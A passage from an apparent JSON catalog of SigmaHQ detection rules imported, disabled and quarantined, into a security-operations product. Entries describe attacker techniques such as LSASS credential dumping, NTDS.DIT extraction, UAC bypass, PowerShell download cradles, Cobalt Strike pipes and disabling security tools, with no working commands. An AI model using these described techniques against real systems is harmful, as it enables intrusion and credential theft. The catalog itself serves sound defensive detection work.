[ "T1134.001", "T1134.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/meterpreter-or-cobalt-strike-getsystem-service-installation-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" } }, { "id": "sigmahq-sigma-844f8eb2-610b-42c8-89a4-47596e089663", "type": "detection", "name": "Potential ShellDispatch.DLL Sideloading", "description": "Detects potential DLL sideloading of \"ShellDispatch.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-shelldispatch-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "844f8eb2-610b-42c8-89a4-47596e089663", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_shelldispatch.yml" } }, { "id": "sigmahq-sigma-8468111a-ef07-4654-903b-b863a80bbc95", "type": "detection", "name": "VHD Image Download Via Browser", "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vhd-image-download-via-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8468111a-ef07-4654-903b-b863a80bbc95", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml" } }, { "id": "sigmahq-sigma-846c7a87-8e14-4569-9d49-ecfd4276a01c", "type": "detection", "name": "DSInternals Suspicious PowerShell Cmdlets - ScriptBlock", "description": "Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.\nThe DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dsinternals-suspicious-powershell-cmdlets-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "846c7a87-8e14-4569-9d49-ecfd4276a01c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_dsinternals_cmdlets.yml" } }, { "id": "sigmahq-sigma-847d5ff3-8a31-4737-a970-aeae8fe21765", "type": "detection", "name": "Potential Tampering With Security Products Via WMIC", "description": "Detects uninstallation or termination of security products using the WMIC utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-tampering-with-security-products-via-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "847d5ff3-8a31-4737-a970-aeae8fe21765", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml" } }, { "id": "sigmahq-sigma-847def9e-924d-4e90-b7c4-5f581395a2b4", "type": "detection", "name": "HackTool - QuarksPwDump Dump File", "description": "Detects a dump file written by QuarksPwDump password dumper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-quarkspwdump-dump-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_quarkspw_filedump.yml" } }, { "id": "sigmahq-sigma-84972c80-251c-4c3a-9079-4f00aad93938", "type": "detection", "name": "Sensitive File Recovery From Backup Via Wbadmin.EXE", "description": "Detects the dump of highly sensitive files such as \"NTDS.DIT\" and \"SECURITY\" hive.\nAttackers can leverage the \"wbadmin\" utility in order to dump sensitive files that might contain credential or sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sensitive-file-recovery-from-backup-via-wbadmin-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84972c80-251c-4c3a-9079-4f00aad93938", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml" } }, { "id": "sigmahq-sigma-84b0a8f3-680b-4096-a45b-e9a89221727c", "type": "detection", "name": "PCRE.NET Package Image Load", "description": "Detects processes loading modules related to PCRE.NET package", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pcre-net-package-image-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84b0a8f3-680b-4096-a45b-e9a89221727c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_pcre_dotnet_dll_load.yml" } }, { "id": "sigmahq-sigma-84b14121-9d14-416e-800b-f3b829c5a14d", "type": "detection", "name": "Suspicious CustomShellHost Execution", "description": "Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\\Windows\\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-customshellhost-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84b14121-9d14-416e-800b-f3b829c5a14d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_customshellhost_susp_exec.yml" } }, { "id": "sigmahq-sigma-84b1706c-932a-44c4-ae28-892b28a25b94", "type": "detection", "name": "OneNote.EXE Execution of Malicious Embedded Scripts", "description": "Detects the execution of malicious OneNote documents that contain embedded scripts.\nWhen a user clicks on a OneNote attachment and then on the malicious link inside the \".one\" file, it exports and executes the malicious embedded script from specific directories.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/onenote-exe-execution-of-malicious-embedded-scripts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84b1706c-932a-44c4-ae28-892b28a25b94", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_onenote_embedded_script_execution.yml" } }, { "id": "sigmahq-sigma-84b1ecf9-6eff-4004-bafb-bae5c0e251b2", "type": "detection", "name": "Potentially Suspicious GoogleUpdate Child Process", "description": "Detects potentially suspicious child processes of \"GoogleUpdate.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-googleupdate-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84b1ecf9-6eff-4004-bafb-bae5c0e251b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_googleupdate_susp_child_process.yml" } }, { "id": "sigmahq-sigma-84b777bd-c946-4d17-aa2e-c39f5a454325", "type": "detection", "name": "RBAC Permission Enumeration Attempt", "description": "Detects identities attempting to enumerate their Kubernetes RBAC permissions.\nIn the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment.\nIn a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a \"kubectl auth can-i --list\" command.\nThis will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.003", "T1087.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rbac-permission-enumeration-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84b777bd-c946-4d17-aa2e-c39f5a454325", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing.yml" } }, { "id": "sigmahq-sigma-84bae5d4-b518-4ae0-b331-6d4afd34d00f", "type": "detection", "name": "MacOS Network Service Scanning", "description": "Detects enumeration of local or remote network services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/macos-network-service-scanning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" } }, { "id": "sigmahq-sigma-84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "type": "detection", "name": "PowerShell Get-Process LSASS in ScriptBlock", "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-get-process-lsass-in-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" } }, { "id": "sigmahq-sigma-84c9e83c-599a-458a-a0cb-0ecce44e807a", "type": "detection", "name": "Ufw Force Stop Using Ufw-Init", "description": "Detects attempts to force stop the ufw using ufw-init", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ufw-force-stop-using-ufw-init.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84c9e83c-599a-458a-a0cb-0ecce44e807a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml" } }, { "id": "sigmahq-sigma-84f52741-8834-4a8c-a413-2eb2269aa6c8", "type": "detection", "name": "DllUnregisterServer Function Call Via Msiexec.EXE", "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dllunregisterserver-function-call-via-msiexec-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" } }, { "id": "sigmahq-sigma-850d55f9-6eeb-4492-ad69-a72338f65ba4", "type": "detection", "name": "C# IL Code Compilation Via Ilasm.EXE", "description": "Detects the use of \"Ilasm.EXE\" in order to compile C# intermediate (IL) code to EXE or DLL.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/c-il-code-compilation-via-ilasm-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ilasm_il_code_compilation.yml" } }, { "id": "sigmahq-sigma-8518ed3d-f7c9-4601-a26c-f361a4256a0c", "type": "detection", "name": "Suspicious Download From File-Sharing Website Via Bitsadmin", "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197", "T1036.003", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-download-from-file-sharing-website-via-bitsadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-851c506b-6b7c-4ce2-8802-c703009d03c0", "type": "detection", "name": "Winlogon Helper DLL", "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winlogon-helper-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "851c506b-6b7c-4ce2-8802-c703009d03c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" } }, { "id": "sigmahq-sigma-851fd622-b675-4d26-b803-14bc7baa517a", "type": "detection", "name": "HackTool - WinPwn Execution - ScriptBlock", "description": "Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046", "T1082", "T1106", "T1518", "T1548.002", "T1552.001", "T1555", "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-winpwn-execution-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "851fd622-b675-4d26-b803-14bc7baa517a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_hktl_winpwn.yml" } }, { "id": "sigmahq-sigma-85254a62-22be-4239-b79c-2ec17e566c37", "type": "detection", "name": "F5 BIG-IP iControl Rest API Command Execution - Webserver", "description": "Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/f5-big-ip-icontrol-rest-api-command-execution-webserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85254a62-22be-4239-b79c-2ec17e566c37", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_f5_tm_utility_bash_api_request.yml" } }, { "id": "sigmahq-sigma-8537c866-072e-460d-bfff-aaf39cbd73d3", "type": "detection", "name": "Potentially Suspicious Inline JavaScript Execution via NodeJS Binary", "description": "Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-inline-javascript-execution-via-nodejs-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8537c866-072e-460d-bfff-aaf39cbd73d3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_inline_node_js_execution.yml" } }, { "id": "sigmahq-sigma-853e74f9-9392-4935-ad3b-2e8c040dae86", "type": "detection", "name": "UAC Bypass Using DismHost", "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-dismhost.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "853e74f9-9392-4935-ad3b-2e8c040dae86", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" } }, { "id": "sigmahq-sigma-855bc8b5-2ae8-402e-a9ed-b889e6df1900", "type": "detection", "name": "Copy From Or To Admin Share Or Sysvol Folder", "description": "Detects a copy command or a copy utility execution to or from an Admin share or remote", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1039", "T1048", "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/copy-from-or-to-admin-share-or-sysvol-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" } }, { "id": "sigmahq-sigma-857c8db3-c89b-42fb-882b-f681c7cf4da2", "type": "detection", "name": "Unsigned Image Loaded Into LSASS Process", "description": "Loading unsigned image (DLL, EXE) into LSASS process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-image-loaded-into-lsass-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_lsass_unsigned_image_load.yml" } }, { "id": "sigmahq-sigma-85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", "type": "detection", "name": "Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet", "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/folder-compress-to-potentially-suspicious-output-via-compress-archive-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_zip_compress.yml" } }, { "id": "sigmahq-sigma-85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "type": "detection", "name": "CobaltStrike Named Pipe Patterns", "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobaltstrike-named-pipe-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml" } }, { "id": "sigmahq-sigma-85b0b087-eddf-4a2b-b033-d771fa2b9775", "type": "detection", "name": "PowerShell Download and Execution Cradles", "description": "Detects PowerShell download and execution cradles.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-download-and-execution-cradles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml" } }, { "id": "sigmahq-sigma-85b88e05-dadc-430b-8a9e-53ff1cd30aae", "type": "detection", "name": "Potentially Suspicious Desktop Background Change Via Registry", "description": "Detects registry value settings that would replace the user's desktop background.\nThis is a common technique used by malware to change the desktop background to a ransom note or other image.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1491.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-desktop-background-change-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85b88e05-dadc-430b-8a9e-53ff1cd30aae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_desktop_background_change.yml" } }, { "id": "sigmahq-sigma-85c312b7-f44d-4a51-a024-d671c40b49fc", "type": "detection", "name": "Service StartupType Change Via Sc.EXE", "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-startuptype-change-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85c312b7-f44d-4a51-a024-d671c40b49fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 